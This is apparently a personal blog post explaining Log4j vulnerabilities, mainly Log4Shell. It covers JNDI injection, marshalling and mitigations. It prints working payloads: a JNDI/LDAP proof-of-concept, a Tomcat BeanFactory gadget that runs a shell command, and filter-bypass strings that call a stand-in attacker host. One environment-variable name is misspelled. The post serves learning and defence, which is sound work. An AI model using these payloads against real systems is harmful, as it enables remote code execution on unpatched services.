Log4j -- Catch Up

This was all over the news ~6 months ago and I was able to briefly glance at the vulnerability: something with how the logging interpreted something. It's time for me to actually look into these vulnerabilities.

What is Log4j?

Log4j is one of the largest Java logging frameworks. It will log messages to the console, or to a file based on the configuration file.

Common Vulnerabilities and Exposures (CVE)

Let's get into some of the CVE's for Log4j from oldest to newest.

CVE-2020-9488

CVE: CVE-2020-9488
Publish Date: 04/27/2020
Severity: 3.7
Severity level: Low
CVE Details
NVD - CVE-2020-9488

This vulnerability allows a Man in the Middle (MitM) attack, which leaks log messages through SMTP or SMTPS.

This vulnerability is enabled because the "SmtpAppender" didn't verify that the host name mached the SSL/TLS certificate. This is cool, but not as cool as a RCE, so let's keep going.


CVE-2021-44228

CVE: CVE-2021-44228
Publish Date: 12/10/2021
Severity: 10
Severity level: Critical
CVE Details
NVD - CVE-2021-44228

This is the big one! A CVE of 10 is the highest severity. "An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled".

LDAP?

All these acronyms can get confusing, LDAP stands for Lightweight Directory Access Protocol and serves as a means to maintain distributed directory information

JNDI

Java Naming and Directory Interface (JNDI). This is a Java API that allows users to make certain requests. At the Service Provider Interface (SPI), JNDI can make requests to RMI (Remote Method Invocation), LDAP, DNS, NIS, NDS, COBRA, etc. I'll get more in depth into this later as this is the root cause of the Log4Shell.

The main takeaway here is that if you can provide input to the logs, anyone can execute code.

A very quick example that is on a lot of github repos:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://127.0.0.1:4321/Log4jRCE}");
    }
}
Vulnerable Java log4j code (from https://github.com/xiajun325/apache-log4j-rce-poc/blob/master/src/main/java/log4j.java)

Compiling and running this java program will cause it to reach out to the LDAP server running on port 4321. To get this to work, we'd need an LDAP server.

To handle this, we can use a popular repo (mbechler/marshalsec) which allows you to send custom marshaled Java payloads.

GitHub - mbechler/marshalsec
Contribute to mbechler/marshalsec development by creating an account on GitHub.
Java Unmarshaller Security - Turning your data into code execution
Infographic on loading code via JNDI

Here's an info graphic on the network traffic through the Log4j exploit process. See the next section for more details, but the marshalsec repository sets up an LDAP server that redirects traffic to a HTTP server that serves the Java .class files to be run via Log4j CVE-2021-44228.

Getting Back To The Root Cause: JNDI and Log4j

This vulnerability is at its core a "simple JNDI Injection flaw, but in a really really bad place" (https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/). Side note this article does a stupendous job at explaining the Log4Shell in the context of JNDI injections, there's also a paper (https://raw.githubusercontent.com/mbechler/marshalsec/master/marshalsec.pdf) that explains the unmarshaller and unmarshalling process.

Essentially JNDI injection research has been around for a while, but because of the prevalence of the Log4j library in almost every java application, it has been brought to the forefront.

A JNDI lookup() call will return a serialized Java object and can be remotely loaded through a LDAP / RMI / COBRA / IIOP server with Java code. For RMI, remote codebase lookups have been disabled by default since 2017. For JNDI, remote lookups were patched in 2018.

Despite codebases being disabled, Michael Stepankin published an article in 2019 that explains that despite remote codebases being disabled, existing factories, such as the Apache Tomcat Server's BeanFactory, can still be used to execute arbitrary code by evalling the following snippet:

{"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.blog.phsc138.com']).start()")}
Bypassing remote codebase fix from: https://www.veracode.com/blog/research/exploiting-jndi-injections-java

This brick of Java is an object passed to the factory that will be evaluated as code to do a name server lookup for jndi.blog.phsc138.com. There are a few more things that need to be added to the RMI server to get it to work, specifically the reference to the BeanFactory and adding the force string reference, but this is the meat and potatoes of it.

This is an example from the Tomcat BeanFactory, other libraries can also be taken advantage of to gain remote code execution.

Marshalling and Unmarshalling

Marshalling "refers to any mechanism to convert from an internal representation to one that can be transferred or stored". So very similar

Serialization "is the process of converting an object into a stream of bytes to store the object or transmit it to memory, a database, or a file" (https://docs.microsoft.com/en-us/dotnet/csharp/programming-guide/concepts/serialization/)

Confused? I am too... Google time!

What is the difference between Serialization and Marshaling?
I know that in terms of several distributed techniques (such as RPC), the term "Marshaling" is used but don’t understand how it differs from Serialization. Aren’t they both transforming o...

Serialization is a part of marshalling, but the codebase, or reference to the code to interpret the data, is attached during marshalling such that the object can be properly interpreted when it is demarshalled.

Section 4.1.2 of the marshalsec article describes how the path to RCE with the JNDI interface. A stored JNDI object can "indicate that it should be loaded from some other directory location". Using the lookup() function with arbitrary input will allow attackers to provide a URL to a malicious server. This malicious server will return a reference to to an object factory with a malicious URL as the codebase.

Exploring Mitigations

A vulnerability blog post isn't complete without a mitigations section.

Input filtering and WAF rules

Filtering for this is extremely difficult as there's a LOT of different techniques to input characters into the ${} expression language syntax.

Some examples:

// https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://somesitehackerofhell.com/z}

// https://twitter.com/ymzkei5/status/1469765165348704256
j${::-nD}i${::-:}
Example jndi filter bypasses

Just Disable Log4j

Remove the JndiLookup class from Java's classpath

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Mitigation from https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

Might not be practical, but it works.

Disable JNDI

There are Java configuration options to disable JNDI lookups

  1. Set log4j2.formatMsgNoLookups java property
  2. Set the LOG4J_FORMAAT_MSG_NO_LOOKUPS environment variable

Again not practical if your applications require this interface, but given the severity of this vulnerability, this is an option.

Apply a Micro Patch

Some micro patches have been released, they are not part of an official release update, but it will help reduce the risk of exploitation.

Swiss Government Response

The Swiss government chimed in with mitigations as well. Mitigation on the first network communication is difficult to do with just input filtering as stated above, but disabling remote codebases from the fifth network step would also be a good tactic to securing an environment.

https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

Detecting if a System is Vulnerable

Log4j doesn't have to be installed manually for  a system to be vulnerable. Log4j is included in a plethora of Java applications used in/by 1Password, 7-zip, Amazon AWS, Cisco, Dell, FedEx, Ghidra, GitHub, GitLab, and plenty more.

log4shell/software at main · NCSC-NL/log4shell
Operational information regarding the log4shell vulnerabilities in the Log4j logging library. - log4shell/software at main · NCSC-NL/log4shell
Status of vulnerable software

Scanning for Log4j

Many companies and individuals have rushed to create a detection method to identify vulnerable services. These have taken the form of Log4j vulnerability scanners.


Closing

In closing, I finally feel like I understand the issue with this bug. The functionality to reference remote code is a great feature until it's exploited by a malicious attacker. Some thoughts I had into possible fixes during this research was a whitelist of LDAP servers, and only enabling JNDI for parts of code that don't accept user input. This whitelist wouldn't be effective for an attacker that has access to an allowed server, but it wouldn't hurt. Restricting JNDI for parts of code would have to be a library implementation and would have to be per thread or process based such that there wouldn't be a race condition for potentially vulnerable parts of the application.

CVE-2021-44228 has been fixed in the most recent releases, so the best recommendation is to patch.

Being able to go through this vulnerability is very cool for me since I was able to learn more about how Java works and see how a major vulnerability is handled by different companies and governments.

PHSC138
The World Wide Web